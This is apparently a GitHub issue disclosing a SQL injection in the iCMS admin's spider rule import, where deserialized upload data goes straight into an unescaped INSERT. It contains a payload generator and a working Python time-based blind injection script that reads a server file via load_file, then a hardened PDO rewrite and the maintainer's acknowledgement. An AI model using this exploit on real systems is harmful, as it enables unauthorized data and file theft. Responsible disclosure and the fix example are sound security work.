
I found a SQL injection vulnerability #42

Closed
P0desta opened this Issue Oct 23, 2018 · 1 comment


P0desta commented Oct 23, 2018

The vulnerability is in the backend.

See line 464 of spider.admincp.php:

    public function do_import_rule() {
        files::$check_data        = false;
        files::$cloud_enable      = false;
        iFS::$config['allow_ext'] = 'txt';
        $F = iFS::upload('upfile');
        $path = $F['RootPath'];
        if ($path) {
            $data = file_get_contents($path);
            if ($data) {
                $data = base64_decode($data);
                $data = unserialize($data);
                iDB::insert("spider_rule", $data);
            }
            @unlink($path);
            iUI::success('规则导入完成', 'js:1');
        }
    }

You can see that the uploaded rule is first base64-decoded, then deserialized, and then passed straight into iDB::insert.

Take a look at insert:

    public static function insert($table, $data, $IGNORE=false) {
        $fields = array_keys($data);
        self::query("INSERT ".($IGNORE?'IGNORE':'')." INTO ".iPHP_DB_PREFIX_TAG."{$table} (`" . implode('`,`',$fields) . "`) VALUES ('".implode("','",$data)."')");
        return self::$insert_id;
    }

There is no filtering, so a payload can be constructed:

<?php
    $data = array("rule"=>"p0desta'or if(1,sleep(5),1))#");
    echo(base64_encode(serialize($data)));

If you have the permission, the injection can be used to read files, and the PoC is written as follows:

import requests
import time
import base64
burp0_url = "http://www.test.com:80/icms/admincp.php?app=spider&do=import_rule&frame=iPHP&CSRF_TOKEN=e10bf76a04f509d4fecbe3d9a9019015e21f12bd"
burp0_cookies = {"iCMS_apps_tab": "apps-type-1", "PHPSESSID": "hklte5he8o90kmmcmep2986jf7", "iCMS_iCMS_AUTH": "a2bab484wFGE7nGTjwffi_SYNVY9ZFggA3JUMGaO1_Ht2uptiqTvhEdCY7b5NHj1gElIXJsgys_WSXLIR7TBZbQInHANWku0zmbXD2GV2NDqB2eIjrKkgK_L2g", "iCMS_article_category_tabs": "tree", "iCMS_USER_AUTH": "dc043aa07gOqcLfWTuJoLSCrKIkbJNa8SPGk1VUKhacikJl4JxbrK2aBNBbk0bbmKnQwweqtz7vvJ93P2lLGBzezHER9aEK_HMs0_39QpgM5hSdhCCNxDv8Lwtx1RRqZEVpWUZBwAjJe9476soMuCC6-gJ1e_mfMMhYSA8ioWG1OUFUvUW07tVg5F0RUP2oamPz91F-t85bDNOEnubfHpxzFMND3EABDYJN0o1HfVweojEDYaxs-l6VEiuc0fFUlm-MIZXnd5xe1h6std5cCRwRCS_H71q-oTNO3NbuyojT9HVlCafwxmz7BTlmfIRHeADx7DImb_UyY_daATbgMffPsEHs4KApMstm9pbT4D53E8YbyCAnCDog4MQ7tV3snwpSRufPJCdeY3fkJUFyDhfbqTiJXEAxAcOWCoxGwLXWPI-Ns9Tyjh4WJChqpy0_gwa3JSszGZOQZaAf86KqeDKdct-YSE2UN6qwRVvUeOijMZrdzPxaqt_1OzlhDeBPlM4UW4xQMh7VQ3q5TcfpIHclZWiAspuU8Ynnj3XEwAo8", "iCMS_userid": "b8423c8bm9SnzUz782Y6XmtRdU1dTR3CL9iqL-Iv83vI7htnIg", "iCMS_nickname": "c3bc646dcSTyka3txmYpDcMW2sUPNhaunl7kIzv0Nf_89GTeIZNk", "iCMS_captcha": "0d9585a2vvMO_fVbJRXMR3w48z84hOnLN7JFLRTPC-BzbX7T"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------21119269733568", "Referer": "http://www.test.com/fiyocms/", "Connection": "keep-alive", "Upgrade-Insecure-Requests": "1"}

result = ''
for i in range(1,5):
    for j in range(97,123):
        p = "p0desta'or if((select ascii(substr((select load_file('E://p0desta.txt')),{0},1))={1}),sleep(5),1))#".format(i,j)
        payload = 'a:1:{s:4:"rule";s:'+str(len(p))+':"'+p+'";}'
        burp0_data="-----------------------------21119269733568\r\nContent-Disposition: form-data; name=\"upfile\"; filename=\"1.txt\"\r\nContent-Type: text/plain\r\n\r\n{0}\r\n-----------------------------21119269733568--\r\n".format(base64.b64encode(payload))
        start_time = time.time()
        content = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
        end_time = time.time()
        if end_time - start_time >= 5:
            result += chr(j)
            print result
            break
print result

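As an added, defender-side example (not iCMS code and not part of this issue), this is the insert rewritten so that values taken from the uploaded rule file can no longer break out of the SQL statement: table and column names are checked against a strict identifier pattern and an explicit allow-list, because identifiers cannot be bound as parameters, and the values themselves are bound. It assumes a PDO connection in $pdo, the raw uploaded text in $uploadedRuleText, and a constructed column list SPIDER_RULE_COLUMNS; the JSON decoding at the end is a swapped-in alternative to unserialize(), not the format iCMS rule files actually use.

```php
<?php
// Added example, not iCMS code. Assumes a MySQL PDO connection $pdo with
// PDO::ATTR_EMULATE_PREPARES set to false, so placeholders are real server-side parameters.

// Columns an imported rule may set. Constructed placeholder list; use the real schema.
const SPIDER_RULE_COLUMNS = ['name', 'url', 'rule', 'charset'];

/**
 * Hardened counterpart to the string-concatenating insert above.
 * Identifiers cannot be bound as parameters, so table and column names are checked
 * against a strict pattern and an allow-list; values are bound, never concatenated.
 */
function safe_insert(PDO $pdo, string $table, array $data, array $allowedColumns, bool $ignore = false): int
{
    if (!preg_match('/^[A-Za-z0-9_]+$/', $table)) {
        throw new InvalidArgumentException('invalid table name');
    }
    $fields = [];
    $placeholders = [];
    foreach ($data as $column => $value) {
        // Reject unexpected keys outright rather than trying to clean them.
        if (!is_string($column) || !in_array($column, $allowedColumns, true)) {
            throw new InvalidArgumentException('column not allowed: ' . var_export($column, true));
        }
        if ($value !== null && !is_scalar($value)) {
            throw new InvalidArgumentException("non-scalar value for $column");
        }
        $fields[] = "`$column`";
        $placeholders[] = ":$column";
    }
    if ($fields === []) {
        throw new InvalidArgumentException('empty row');
    }
    $sql = sprintf('INSERT %s INTO `%s` (%s) VALUES (%s)',
        $ignore ? 'IGNORE' : '', $table, implode(', ', $fields), implode(', ', $placeholders));
    $stmt = $pdo->prepare($sql);
    foreach ($data as $column => $value) {
        $stmt->bindValue(":$column", $value); // quote and comment characters stay inside the value
    }
    $stmt->execute();
    return (int) $pdo->lastInsertId();
}

// Decode the uploaded rule without unserialize(): json_decode() cannot instantiate
// classes, so a hostile file can at most yield an array that the allow-list then rejects.
// Depth 2 permits exactly one flat object. (Alternative format, not iCMS behaviour.)
$decoded = json_decode(base64_decode($uploadedRuleText, true), true, 2);
if (!is_array($decoded)) {
    throw new RuntimeException('rule file is not a flat JSON object');
}
$newId = safe_insert($pdo, 'spider_rule', $decoded, SPIDER_RULE_COLUMNS);
```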


idreamsoft commented Oct 23, 2018

Thank you, we will fix it as soon as possible.
